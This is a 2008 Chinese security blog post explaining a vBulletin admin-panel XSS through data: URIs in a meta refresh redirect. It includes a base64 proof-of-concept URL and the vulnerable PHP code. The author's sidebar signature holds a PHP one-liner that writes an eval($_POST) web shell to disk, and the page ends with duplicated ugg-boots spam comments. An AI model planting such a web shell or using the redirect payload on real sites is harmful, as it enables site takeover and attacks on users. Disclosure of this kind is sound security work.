-
2008-06-21
Data:_URI_scheme
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
Data:_URI_scheme
http://superhei.blogbus.com/logs/23355141.html
前几天FD上公布了一个vbb的xss: http://seclists.org/fulldisclosure/2008/Jun/0181.html,这个bug比较有意思:
admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
代码:admincp/index.php 98-107
if (!empty($vbulletin->GPC['redirect']))
{
require_once(DIR . '/includes/functions_login.php');
$redirect = htmlspecialchars_uni(fetch_replaced_session_url($vbulletin->GPC['redirect']));
print_cp_header($vbphrase['redirecting_please_wait'], '', "<meta http-equiv=\"Refresh\" content=\"0; URL=$redirect\" />");
echo "<p> </p><blockquote><p>$vbphrase[redirecting_please_wait]</p></blockquote>";
print_cp_footer();
exit;
}
http-equiv里的url使用data:text/html 实现xss。
在firefox官方的资料:http://www.mozilla.org/quality/networking/testing/datatests.html
wiki的资料:http://en.wikipedia.org/wiki/Data:_URI_scheme
可以看得出来data:类似于javasript:,那么这个估计可以跨很多程序了,在你测试xss不要忘记了data:
data:有几个特点:
1.可以指定MIME-type如text/html
2.可以指定编码如data:;charset=UTF-8,Hello
3.firefox/ie8/Opera等支持它
随机文章:
wmic-The WMI command-line 2008-04-04Discuz!/phpwind flash标签的xss 2007-12-10做人也要有那么点原则 2007-05-24SET CHARACTER 2007-04-28Oedipus 2006-04-08
收藏到:Del.icio.us
5up3rh3i'blog[提供有偿web代码安全审计服务]
MSN:SuperHei@ph4nt0m.org< ?fputs(fopen('heige.php','w+'),'< ?php @eval($_POST[c])? >');? >
搜索
最新文章
最新评论
链接
- #########
- 舒舒
- 二哥哥
- lanker
- fa1l3n
- axis
- swap
- lvhuana
- spr1t3
- 小沈
- fox
- 随便名字
- GaRY
- 7j
- RAyH4c
- #########
- PST
- HackTic
- 2600
- NGS
- cgisecurity
- owasp
- seclists
- argeniss
- phpsec
- bugtraq
- milw0rm
- phpsecure
- T.H.C
- webappsec
- phpsec'blog
- shiflett.org
- secyou
- Rst
- waraxe
- appsecinc
- northern-monkee
- blog.0x557
- ush
- EST
- securityreason
- infoshackers
- zwell
- spidynamics
- morx
- securitytracker
- modsecurity
- securiteam
- securiteam's blog
- phpclasse
- hardened-php
- csdn
- pro-hack
- f-secure
- rubyforge
- wisec
- redteam-pentesting
- alertpool
- blog.php-security
- timvw
- sqlsec
- sourceforge
- zeroknock
- qasec
- hacksafe
- smartsecurity
- gulftech
- thespanner
- nth-dimension.org.uk
- secweb
- cera.secniche.org
- swan不是牛
- Getahead
- xssed
- kuza55
- myappsecurity
- xssworm
- playhack
- hackademix
- manicode
- switch
- planet-websecurity
- disenchant.ch
- hackathology
- blueinfy
- bindshell
- net-square
- yaisb
- sirdarckcat
- googleonlinesecurity
- ########
- darkc0de
- darknet
- insecuremag
- serversniff
- tbs_pocket_knife
- seeknot
- php手册
- frsirt-google
- grip
- vuln.watch
- securitytracker.com
- connectionstrings
- oracle sec
- r00tin
- rawlab
- sommarskog
- taossa
- neilcar
- spl0it
- notsosecure.com
- dross
- ie's blog
- bluehat
评论
There is nothing that touches these <a href="http://www.buddyugg.com/"><strong>ugg boots</strong></a> for just lazing around at home. Bar sleeping I don’t take mine off now that its getting colder, they are not quite as stiff as they were when they first arrived but still extremely comfortable. It would be nice if they had a little more arch support but other than that I’m very pleased.
There is nothing that touches these <a href="http://www.buddyugg.com/"><strong>ugg boots</strong></a> for just lazing around at home. Bar sleeping I don’t take mine off now that its getting colder, they are not quite as stiff as they were when they first arrived but still extremely comfortable. It would be nice if they had a little more arch support but other than that I’m very pleased.